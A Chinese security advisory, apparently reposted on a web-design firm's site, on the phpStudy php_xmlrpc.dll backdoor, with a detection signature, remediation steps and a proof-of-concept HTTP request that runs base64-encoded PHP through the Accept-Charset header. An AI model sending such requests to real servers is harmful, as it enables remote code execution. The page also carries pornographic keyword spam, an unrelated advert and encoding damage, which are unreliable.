真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

phpStudypoc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法

phpStudy于近日被暴露出有后門漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木馬后門,導(dǎo)致許多網(wǎng)站及服務(wù)器被攻擊,被篡改,目前我們SINE安全公司立即成立phpStudy安全應(yīng)急響應(yīng)小組,針對部分客戶服務(wù)器上安裝該P(yáng)HP一鍵環(huán)境搭建的情況,進(jìn)行了全面的漏洞修復(fù)與安全防護(hù)。第一時間保障客戶的網(wǎng)站安全,以及服務(wù)器的安全穩(wěn)定運(yùn)行。關(guān)于該漏洞的詳情,我們來安全分析一下,以及復(fù)現(xiàn),漏洞修復(fù),三個方面來入手。

創(chuàng)新互聯(lián)-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價比華安網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式華安網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋華安地區(qū)。費(fèi)用合理售后完善,十余年實(shí)體公司更值得信賴。

phpStudy poc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法

國內(nèi)大部分的服務(wù)器尤其windows系統(tǒng),都有安裝phpstudy一鍵環(huán)境搭建軟件,該軟件可以自動設(shè)置安裝apache,php,MySQL數(shù)據(jù)庫,以及zend安裝,并自動設(shè)置root賬號密碼,一鍵化操作,深受廣大網(wǎng)站運(yùn)營以及服務(wù)器維護(hù)者的喜歡,正因?yàn)槭褂玫娜溯^多,導(dǎo)致被攻擊者盯上并植入木馬后門到exe程序包中。

該后門文件是PHP環(huán)境當(dāng)中的php_xmlrpc.dll模塊被植入木馬后門,具體的名稱,經(jīng)過我們SINE安全技術(shù)的安全檢測,可以確定是phpstudy2016.11.03版本,以及phpstudy2018.02.11版本,后門文件如下:

phpStudy poc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法

phpphp-5.2.17extphp_xmlrpc.dll

phpphp-5.4.45extphp_xmlrpc.dll

PHPTutorialphpphp-5.2.17extphp_xmlrpc.dll

PHPTutorialphpphp-5.4.45extphp_xmlrpc.dll

在phpstudy文件夾下面搜索php_xmlrpc.dll文件,看下這個dll文件里是否包含@eval(%s('%s'))內(nèi)容的字符,如果有的話,基本上就是有木馬后門了。截圖如下:

phpStudy poc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法

我們來分析復(fù)現(xiàn)漏洞看下,是否可以成功的利用,首先本地安裝phpstudy2016.11.03版本的安裝壓縮包,解壓到當(dāng)前目錄直接點(diǎn)擊EXE運(yùn)行即可,默認(rèn)安裝的PHP版本就是php5.4.45版本,然后本地打開看下,用抓包工具檢測當(dāng)前的數(shù)據(jù)包。

phpStudy poc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法

GET /safe.php HTTP/1.1

Host:

Cache-Control: max-age=1

Upgrade-Insecure-Requests: 2

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Accept:

Accept-Language: zh-CN,zh;q=0.6

Accept-Encoding:gzip

Accept-Charset:=cGhwaW5mbyUyOCUyOSUzQg==(這個是POC代碼加密的)

Cookie: Hm_lpvt_49143271fe785debb3b77f77f7c71752=1569485559;

Connection: close

漏洞的執(zhí)行位置是在數(shù)據(jù)包的Accept-Charset里,這里寫入惡意代碼加密的phpinfo,然后提交過去,就會執(zhí)行phpinfo語句。

phpStudy poc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法

關(guān)于phpstudy漏洞的修復(fù)辦法,從phpstudy官方網(wǎng)站下載最新的版本,將php_xmlrpc.dll進(jìn)行替換到舊版本里即可,對PHP的Accept-Charset的參數(shù)傳輸做安全過濾與效驗(yàn)防止提交惡意參數(shù),禁止代碼的傳輸,即可修復(fù)此漏洞, (經(jīng)證實(shí)對此phpstudy官方公告此后門是黑客之前入侵了官網(wǎng)篡改了程序包導(dǎo)致的安全問題,強(qiáng)烈鄙視黑客的行為?。┤绻鷮Υa不是太了解的話,也可以找專業(yè)的網(wǎng)站安全公司來處理解決,國內(nèi)SINESAFE,啟明星辰,綠盟都是比較不錯的,目前該漏洞影響范圍較廣,請各位網(wǎng)站運(yùn)營者盡快修復(fù)漏洞,打好補(bǔ)丁,防止網(wǎng)站被攻擊,被篡改。


網(wǎng)站題目:phpStudypoc漏洞復(fù)現(xiàn)以及漏洞修復(fù)辦法
標(biāo)題URL:http://weahome.cn/article/gedcge.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部